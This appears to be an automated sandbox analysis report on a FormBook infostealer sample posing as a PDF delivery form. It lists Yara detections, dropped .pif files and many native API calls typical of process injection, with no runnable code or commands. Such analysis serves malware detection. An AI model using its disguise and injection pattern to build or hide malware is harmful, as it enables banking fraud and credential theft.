Source: unknown	HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.6:49712 version: TLS 1.2

Source: Yara match

File source: Process Memory Space: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe PID: 6620, type: MEMORYSTR

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 18.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2769119926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2792693070.000000001CB90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2833990663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2690787267.00000000228E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2863377435.000000002C280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE8254 NtReadVirtualMemory,	0_2_02CE8254
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE84C4 NtUnmapViewOfSection,	0_2_02CE84C4
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CEDACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,	0_2_02CEDACC
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CEDA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,	0_2_02CEDA44
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE8BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_02CE8BB0
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CEDBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_02CEDBB0
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE79B4 NtAllocateVirtualMemory,	0_2_02CE79B4
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE7D00 NtWriteVirtualMemory,	0_2_02CE7D00
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE8BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_02CE8BAE
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CED9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,	0_2_02CED9F0
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CE79B2 NtAllocateVirtualMemory,	0_2_02CE79B2
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_0042CB13 NtClose,	5_2_0042CB13
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2B60 NtClose,LdrInitializeThunk,	5_2_22AB2B60
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_22AB2C70
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_22AB2DF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB35C0 NtCreateMutant,LdrInitializeThunk,	5_2_22AB35C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB4340 NtSetContextThread,	5_2_22AB4340
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB4650 NtSuspendThread,	5_2_22AB4650
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2AB0 NtWaitForSingleObject,	5_2_22AB2AB0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2AF0 NtWriteFile,	5_2_22AB2AF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2AD0 NtReadFile,	5_2_22AB2AD0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2BA0 NtEnumerateValueKey,	5_2_22AB2BA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2B80 NtQueryInformationFile,	5_2_22AB2B80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2BE0 NtQueryValueKey,	5_2_22AB2BE0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2BF0 NtAllocateVirtualMemory,	5_2_22AB2BF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2EA0 NtAdjustPrivilegesToken,	5_2_22AB2EA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2E80 NtReadVirtualMemory,	5_2_22AB2E80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2EE0 NtQueueApcThread,	5_2_22AB2EE0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2E30 NtWriteVirtualMemory,	5_2_22AB2E30
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2FA0 NtQuerySection,	5_2_22AB2FA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2FB0 NtResumeThread,	5_2_22AB2FB0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2F90 NtProtectVirtualMemory,	5_2_22AB2F90
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2FE0 NtCreateFile,	5_2_22AB2FE0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2F30 NtCreateSection,	5_2_22AB2F30
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2F60 NtCreateProcessEx,	5_2_22AB2F60
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2CA0 NtQueryInformationToken,	5_2_22AB2CA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2CF0 NtOpenProcess,	5_2_22AB2CF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2CC0 NtQueryVirtualMemory,	5_2_22AB2CC0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2C00 NtQueryInformationProcess,	5_2_22AB2C00
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2C60 NtCreateKey,	5_2_22AB2C60
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2DB0 NtEnumerateKey,	5_2_22AB2DB0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2DD0 NtDelayExecution,	5_2_22AB2DD0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2D30 NtUnmapViewOfSection,	5_2_22AB2D30
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2D00 NtSetInformationFile,	5_2_22AB2D00
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2D10 NtMapViewOfSection,	5_2_22AB2D10
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB3090 NtSetValueKey,	5_2_22AB3090
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB3010 NtOpenDirectoryObject,	5_2_22AB3010
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB39B0 NtGetContextThread,	5_2_22AB39B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB3D10 NtOpenProcessToken,	5_2_22AB3D10
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB3D70 NtOpenThread,	5_2_22AB3D70
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: 9_2_02CC8254 NtReadVirtualMemory,	9_2_02CC8254
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: 9_2_02CC84C4 NtUnmapViewOfSection,	9_2_02CC84C4
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: 9_2_02CCDACC NtCreateFile,NtWriteFile,NtClose,	9_2_02CCDACC
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: 9_2_02CCDA44 NtDeleteFile,	9_2_02CCDA44
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: 9_2_02CC8BB0 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,	9_2_02CC8BB0
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: 9_2_02CCDBB0 NtOpenFile,NtReadFile,NtClose,	9_2_02CCDBB0
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: 9_2_02CC79B4 NtAllocateVirtualMemory,	9_2_02CC79B4
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: 9_2_02CC7D00 NtWriteVirtualMemory,	9_2_02CC7D00
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: 9_2_02CC8BAE Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,	9_2_02CC8BAE
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: 9_2_02CCD9F0 NtDeleteFile,	9_2_02CCD9F0
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: 9_2_02CC79B2 NtAllocateVirtualMemory,	9_2_02CC79B2
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC635C0 NtCreateMutant,LdrInitializeThunk,	12_2_1CC635C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62C70 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_1CC62C70
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62DF0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_1CC62DF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62B60 NtClose,LdrInitializeThunk,	12_2_1CC62B60
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC63D70 NtOpenThread,	12_2_1CC63D70
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC63D10 NtOpenProcessToken,	12_2_1CC63D10
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC639B0 NtGetContextThread,	12_2_1CC639B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC63090 NtSetValueKey,	12_2_1CC63090
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC63010 NtOpenDirectoryObject,	12_2_1CC63010
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62CC0 NtQueryVirtualMemory,	12_2_1CC62CC0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62CF0 NtOpenProcess,	12_2_1CC62CF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62CA0 NtQueryInformationToken,	12_2_1CC62CA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62C60 NtCreateKey,	12_2_1CC62C60
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62C00 NtQueryInformationProcess,	12_2_1CC62C00
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62DD0 NtDelayExecution,	12_2_1CC62DD0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62DB0 NtEnumerateKey,	12_2_1CC62DB0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62D00 NtSetInformationFile,	12_2_1CC62D00
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62D10 NtMapViewOfSection,	12_2_1CC62D10
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62D30 NtUnmapViewOfSection,	12_2_1CC62D30
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62EE0 NtQueueApcThread,	12_2_1CC62EE0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62E80 NtReadVirtualMemory,	12_2_1CC62E80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62EA0 NtAdjustPrivilegesToken,	12_2_1CC62EA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62E30 NtWriteVirtualMemory,	12_2_1CC62E30
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62FE0 NtCreateFile,	12_2_1CC62FE0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62F90 NtProtectVirtualMemory,	12_2_1CC62F90
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62FA0 NtQuerySection,	12_2_1CC62FA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62FB0 NtResumeThread,	12_2_1CC62FB0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62F60 NtCreateProcessEx,	12_2_1CC62F60
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62F30 NtCreateSection,	12_2_1CC62F30
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62AD0 NtReadFile,	12_2_1CC62AD0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62AF0 NtWriteFile,	12_2_1CC62AF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62AB0 NtWaitForSingleObject,	12_2_1CC62AB0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62BE0 NtQueryValueKey,	12_2_1CC62BE0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62BF0 NtAllocateVirtualMemory,	12_2_1CC62BF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62B80 NtQueryInformationFile,	12_2_1CC62B80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC62BA0 NtEnumerateValueKey,	12_2_1CC62BA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC64650 NtSuspendThread,	12_2_1CC64650
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 12_2_1CC64340 NtSetContextThread,	12_2_1CC64340

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Code function: 0_2_02CE85DC CreateProcessAsUserW,

0_2_02CE85DC

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CD20C4	0_2_02CD20C4
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: 0_2_02CDD57A	0_2_02CDD57A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_00402870	5_2_00402870
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_004010E0	5_2_004010E0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_0042F143	5_2_0042F143
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_0040496A	5_2_0040496A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_004101D3	5_2_004101D3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_00403230	5_2_00403230
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_004012C0	5_2_004012C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_0040E3CA	5_2_0040E3CA
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_0040E3D3	5_2_0040E3D3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_004103F3	5_2_004103F3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_00416B9E	5_2_00416B9E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_00416BA3	5_2_00416BA3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_0040E518	5_2_0040E518
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_0040E523	5_2_0040E523
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_004025B0	5_2_004025B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B002C0	5_2_22B002C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20274	5_2_22B20274
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B403E6	5_2_22B403E6
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8E3F0	5_2_22A8E3F0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3A352	5_2_22B3A352
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B12000	5_2_22B12000
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B401AA	5_2_22B401AA
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B381CC	5_2_22B381CC
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A70100	5_2_22A70100
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1A118	5_2_22B1A118
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B08158	5_2_22B08158
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9C6E0	5_2_22A9C6E0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7C7C0	5_2_22A7C7C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80770	5_2_22A80770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA4750	5_2_22AA4750
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B2E4F6	5_2_22B2E4F6
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B24420	5_2_22B24420
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B32446	5_2_22B32446
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B40591	5_2_22B40591
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80535	5_2_22A80535
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7EA80	5_2_22A7EA80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B36BD7	5_2_22B36BD7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3AB40	5_2_22B3AB40
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A668B8	5_2_22A668B8
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE8F0	5_2_22AAE8F0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8A840	5_2_22A8A840
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A82840	5_2_22A82840
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B4A9A6	5_2_22B4A9A6
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A96962	5_2_22A96962
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3CE93	5_2_22B3CE93
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A92E90	5_2_22A92E90
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3EEDB	5_2_22B3EEDB
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3EE26	5_2_22B3EE26
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80E59	5_2_22A80E59
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFEFA0	5_2_22AFEFA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8CFE0	5_2_22A8CFE0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A72FC8	5_2_22A72FC8
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B22F30	5_2_22B22F30
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AC2F28	5_2_22AC2F28
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA0F30	5_2_22AA0F30
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF4F40	5_2_22AF4F40
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B20CB5	5_2_22B20CB5
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A70CF2	5_2_22A70CF2
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80C00	5_2_22A80C00
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A98DBF	5_2_22A98DBF
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7ADE0	5_2_22A7ADE0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8AD00	5_2_22A8AD00
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1CD1F	5_2_22B1CD1F
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A852A0	5_2_22A852A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B212ED	5_2_22B212ED
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9B2C0	5_2_22A9B2C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AC739A	5_2_22AC739A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3132D	5_2_22B3132D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6D34C	5_2_22A6D34C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3F0E0	5_2_22B3F0E0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B370E9	5_2_22B370E9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A870C0	5_2_22A870C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B2F0CC	5_2_22B2F0CC
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8B1B0	5_2_22A8B1B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB516C	5_2_22AB516C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6F172	5_2_22A6F172
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B4B16B	5_2_22B4B16B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B316CC	5_2_22B316CC
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3F7B0	5_2_22B3F7B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3F43F	5_2_22B3F43F
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A71460	5_2_22A71460
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1D5B0	5_2_22B1D5B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B37571	5_2_22B37571
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AC5AA0	5_2_22AC5AA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B21AA3	5_2_22B21AA3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1DAAC	5_2_22B1DAAC
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B2DAC6	5_2_22B2DAC6
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF3A6C	5_2_22AF3A6C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B37A46	5_2_22B37A46
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3FA49	5_2_22B3FA49
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9FB80	5_2_22A9FB80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22ABDBF9	5_2_22ABDBF9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF5BF0	5_2_22AF5BF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3FB76	5_2_22B3FB76
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A838E0	5_2_22A838E0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AED800	5_2_22AED800
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B15910	5_2_22B15910
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A89950	5_2_22A89950
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9B950	5_2_22A9B950
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A89EB0	5_2_22A89EB0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3FFB1	5_2_22B3FFB1
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A81F92	5_2_22A81F92
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3FF09	5_2_22B3FF09
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3FCF2	5_2_22B3FCF2
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF9C32	5_2_22AF9C32
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9FDC0	5_2_22A9FDC0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B37D73	5_2_22B37D73
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A83D40	5_2_22A83D40
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B31D5A	5_2_22B31D5A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_1_00401560	5_1_00401560
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_1_00402058	5_1_00402058
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_1_004010E0	5_1_004010E0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_1_00403230	5_1_00403230
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_1_004012C0	5_1_004012C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_1_00403350	5_1_00403350
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_1_00401553	5_1_00401553
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_1_004025B0	5_1_004025B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_1_00402870	5_1_00402870
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_1_00401D69	5_1_00401D69
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_1_00401D70	5_1_00401D70
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Code function: 9_2_02CB20C4	9_2_02CB20C4
